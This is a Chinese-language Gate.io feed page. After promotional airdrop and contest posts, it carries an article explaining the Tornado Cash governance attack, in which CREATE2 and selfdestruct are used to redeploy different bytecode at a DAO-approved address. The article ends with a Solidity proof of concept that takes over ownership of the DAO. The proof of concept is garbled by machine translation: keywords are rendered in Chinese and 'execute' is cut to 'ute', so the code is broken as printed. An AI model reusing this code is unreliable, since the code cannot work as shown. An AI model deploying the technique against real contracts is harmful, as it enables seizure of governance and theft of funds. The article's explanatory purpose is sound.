- 置頂
- 🎉 慶祝 BOOP( $BOOP )在MemeBox 全球首發上線,限時空投活動正式開啓!
總獎池:92,650 BOOP
完成以下操作均可參與空投獎勵:
1. 首次在 MemeBox 完成交易
2. 活動期間交易 $BOOP
3. 向 Gate.io帳戶充值 $BOOP
📢 數量有限,先到先得,立即參與!
👉 更多詳情:https://www.gate.io/announcements/article/44795
#Gateio # #GateioMemeBox # #Airdrop#
- Gateio 腦力大挑戰!哪個是正確答案?
💰 $10點卡* 4位獲獎者
參與方式:
1️⃣ 關注 Gateio動態_Official
2️⃣ 點讚此條動態貼文
3️⃣ 在評論中留下你的答案
截止時間:5月9日 18:00(UTC+8)
- Gate.io 推薦話題每日發帖活動: #以太坊 Pectra 升级#
💰 請帶上話題 #以太坊 Pectra 升级# 發帖,5位優質發帖者*每人$10點卡獎勵
以太坊 Pectra 升級將於 5 月 7 日開啓,帶來帳戶功能增強、驗證者體驗優化及對 L2 擴展的支持等多項改進。你認爲這次升級會推高 ETH 價格嗎?帶上話題 #以太坊 Pectra 升级# 發帖分享你的預測與交易策略,參與瓜分 $50 獎勵!
📅 活動時間:5月6日12:00 - 5月7日12:00 (UTC+8)
⚠️ 注意事項:禁止抄襲,鼓勵原創內容
- 想當加密社區領袖人物?秀出你的創意力?
來 Gate.io動態 成爲動態大使,拿專屬福利!
限量週邊、專屬任務、動態VIP5全解鎖,福利多到爆!
速來報名 👉️ www.gate.io/questionnaire/4937
詳情:www.gate.io/announcements/article/38592
Tornado治理攻擊:如何同一個地址上部署不同的合約
大概兩週前(5 月20 日),知名混幣協議Tornado Cash 遭受到治理攻擊,黑客獲取到了Tornado Cash的治理合約的控制權(Owner)。
攻擊過程是這樣的:攻擊者先提交了一個“看起來正常”的提案, 待提案通過之後, 銷毀了提案要執行的合約地址, 並在該地址上重新創建了一個攻擊合約。
攻擊過程可以查看SharkTeam 的Tornado.Cash提案攻擊原理分析 [1] 。
這裡攻擊的關鍵是在同一個地址上部署了不同的合約, 這是如何實現的呢?
背景知識
EVM 中有兩個操作碼用來創建合約:CREATE 與CREATE2 。
CREATE 操作碼
當使用new Token() 使用的是CREATE 操作碼, 創建的合約地址計算函數為:
地址 tokenAddr = bytes20(keccak256(senderAddress, nonce))
創建的合約地址是通過創建者地址 + 創建者Nonce(創建合約的數量)來確定的, 由於Nonce 總是逐步遞增的, 當Nonce 增加時,創建的合約地址總是是不同的。
CREATE2 操作碼
當添加一個salt時new Token{salt: bytes32()}() ,則使用的是CREATE2 操作碼, 創建的合約地址計算函數為:
地址 tokenAddr = bytes20(keccak256(0xFF, senderAddress, salt, bytecode))
創建的合約地址是創建者地址 + 自定義的鹽 + 要部署的智能合約的字節碼, 因此只有相同字節碼和使用相同的鹽值,才可以部署到同一個合約地址上。
那麼如何才能在同一地址如何部署不用的合約?
攻擊手段
攻擊者結合使用Create2 和Create 來創建合約, 如圖:
先用Create2 部署一個合約Deployer , 在Deployer 使用Create 創建目標合約Proposal(用於提案使用)。 Deployer 和Proposal 合約中均有自毀實現(selfdestruct)。
在提案通過後,攻擊者把Deployer 和Proposal 合約銷毀,然後重新用相同的slat創建Deployer , Deployer 字節碼不變,slat 也相同,因此會得到一個和之前相同的Deployer 合約地址, 但此時Deployer 合約的狀態被清空了, nonce 從0 開始,因此可以使用該nonce 創建另一個合約Attack。
攻擊代碼示例
此代碼來自:
// SPDX 許可證標識符:MIT pragma solidity ^0.8.17; 合約 DAO { 結構提案 { 地址目標; 布爾批准; 布爾泰特; } 地址 public owner = msg.sender; Proposal[] 公開提案; 功能批准(地址目標)外部{ require(msg.sender == owner, "未授權"); proposals.push(提案({target: target, approved: true, uted: false})); } 函數 ute(uint256 proposalId) 外部應付款 { 提案存儲提案 = proposals [proposalId] ; 要求(提案。批准,“未批准”); 要求(!proposal.uted,“uted”); proposal.uted = true; (bool ok, ) = proposal.target.delegatecall( abi.encodeWithSignature("uteProposal()") ); require(ok, "委託調用失敗"); } } 合同提案{ 事件日誌(字符串消息); 函數 uteProposal() 外部 { emit Log("DAO 批准的執行代碼"); } 函數 emergencyStop() 外部 { 自毀(應付(地址(0))); } } 合同攻擊{ 事件日誌(字符串消息); 地址公共所有者; 函數 uteProposal() 外部 { emit Log("執行的代碼未被 DAO 批准 :)"); // 例如 - 將 DAO 的所有者設置為攻擊者 owner = msg.sender; } } 合約 DeployerDeployer { 事件日誌(地址地址); 函數部署()外部{ bytes32 salt = keccak256(abi.encode(uint(123))); 地址addr =地址(新部署者{salt:salt}()); 發出日誌(地址); } } 合同部署者{ 事件日誌(地址地址); 函數 deployProposal() 外部 { 地址地址=地址(新提案()); 發出日誌(地址); } 函數 deployAttack() 外部 { 地址地址=地址(新攻擊()); 發出日誌(地址); } 函數 kill() 外部 { 自毀(應付(地址(0))); } }
大家可以使用該代碼自己在Remix 中演練一下。